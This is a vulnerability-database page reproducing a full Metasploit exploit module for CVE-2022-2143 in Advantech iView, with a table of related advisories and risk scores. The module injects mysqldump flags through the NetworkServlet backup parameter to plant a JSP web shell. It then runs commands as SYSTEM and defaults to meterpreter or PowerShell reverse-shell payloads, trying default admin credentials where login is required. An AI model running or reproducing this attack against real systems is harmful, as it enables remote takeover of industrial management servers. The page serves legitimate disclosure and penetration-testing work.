Vulners
Lucene search
Advantech iView NetworkServlet Command Injection Exploit
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | CVE-2022-2143 | 22 Jul 202218:19 | – | circl |
 | Advantech iView 命令注入漏洞 | 28 Jun 202200:00 | – | cnnvd |
 | Advantech iView Command Injection Vulnerability (CNVD-2023-16477) | 30 Jun 202200:00 | – | cnvd |
 | Advantech iView Command Injection (CVE-2022-2143) | 31 Oct 202200:00 | – | checkpoint_advisories |
 | CVE-2022-2143 | 22 Jul 202214:59 | – | cve |
 | CVE-2022-2143 Advantech iView | 22 Jul 202214:59 | – | cvelist |
 | Advantech iView | 28 Jun 202200:00 | – | ics |
 | Advantech iView NetworkServlet Command Injection | 29 Aug 202218:02 | – | metasploit |
 | CVE-2022-2143 | 22 Jul 202215:15 | – | nvd |
 | CVE-2022-2143 | 22 Jul 202215:15 | – | osv |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Advantech iView NetworkServlet Command Injection',
'Description' => %q{
Versions of Advantech iView software below `5.7.04.6469` are
vulnerable to an unauthenticated command injection vulnerability
via the `NetworkServlet` endpoint.
The database backup functionality passes a user-controlled parameter,
`backup_file` to the `mysqldump` command. The sanitization functionality only
tests for SQL injection attempts and directory traversal, so leveraging the
`-r` and `-w` `mysqldump` flags permits exploitation.
The command injection vulnerability is used to write a payload on the target
and achieve remote code execution as NT AUTHORITY\SYSTEM.
},
'License' => MSF_LICENSE,
'Author' => [
'rgod', # Vulnerability discovery
'y4er', # PoC
'Shelby Pace' # Metasploit module
],
'References' => [
[ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],
[ 'CVE', '2022-2143']
],
'Platform' => [ 'win' ],
'Privileged' => true,
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[
'Windows Dropper',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Type' => :win_dropper,
'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],
'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
}
],
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
}
]
],
'DisclosureDate' => '2022-06-28',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
}
)
)
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),
OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),
OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])
]
)
end
def check
res = send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
return CheckCode::Unknown('Failed to receive a response from the application') unless res
unless res.body.include?('iView')
return CheckCode::Safe('No confirmation that target is Advantech iView')
end
res = send_db_backup_request('')
return CheckCode::Detected('Failed to receive response from backup request') unless res
# The patch added auth as a requirement for
# accessing the NetworkServlet endpoint
if res.body =~ /ERROR:\s+User\s+Not\sLogin/
@needs_auth = true
print_status('Vulnerability is present, though authentication is required.')
end
CheckCode::Appears
end
def send_db_backup_request(filename)
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
'keep_cookies' => true,
'vars_post' =>
{
'page_action_type' => 'backupDatabase',
'backup_filename' => filename
}
)
end
def format_jsp
bin_nums = []
arg_nums = []
flag_nums = []
bin_param.each_char { |c| bin_nums << c.ord }
bin_nums = bin_nums.join(',')
arg_param.each_char { |c| arg_nums << c.ord }
arg_nums = arg_nums.join(',')
flag_param.each_char { |c| flag_nums << c.ord }
flag_nums = flag_nums.join(',')
'<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \
'new ProcessBuilder(request.getParameter(' \
"new java.lang.String(new byte[]{#{bin_nums}}))," \
"request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \
"request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \
'.getInputStream()))%>'
end
def flag_param
@flag_param ||= Rex::Text.rand_text_alpha(3..8)
end
def arg_param
@arg_param ||= Rex::Text.rand_text_alpha(3..8)
end
def bin_param
@bin_param ||= Rex::Text.rand_text_alpha(3..8)
end
def jsp_filename
@jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
end
def execute_command(cmd, _opts = {})
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, jsp_filename),
'keep_cookies' => true,
'vars_get' =>
{
bin_param => 'cmd.exe',
flag_param => '/c',
arg_param => cmd
}
)
end
def iview_authenticate
res = send_request_cgi!(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')
vprint_good('Successfully accessed the login page')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'CommandServlet'),
'keep_cookies' => true,
'vars_post' => {
'page_action_service' => 'UserServlet',
'page_action_type' => 'login',
'user_name' => datastore['USERNAME'],
'user_password' => datastore['PASSWORD'],
'use_ldap' => 'false',
'data' => ''
}
)
unless res && res.body.include?('Success')
fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')
end
vprint_good('Authentication successful!')
end
def need_auth?
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'NetworkServlet')
)
return false unless res
!!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)
end
def exploit
if @needs_auth || need_auth?
iview_authenticate
end
jsp_code = format_jsp
sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"
full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""
res = send_db_backup_request(full_cmd)
fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res
path = "webapps\\iView3\\#{jsp_filename}"
register_file_for_cleanup(path)
if target['Type'] == :win_dropper
execute_cmdstager
else
execute_command(payload.encoded)
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Aug 2022 00:00Current
10High risk
Vulners AI Score10
CVSS 3.19.8
EPSS0.58306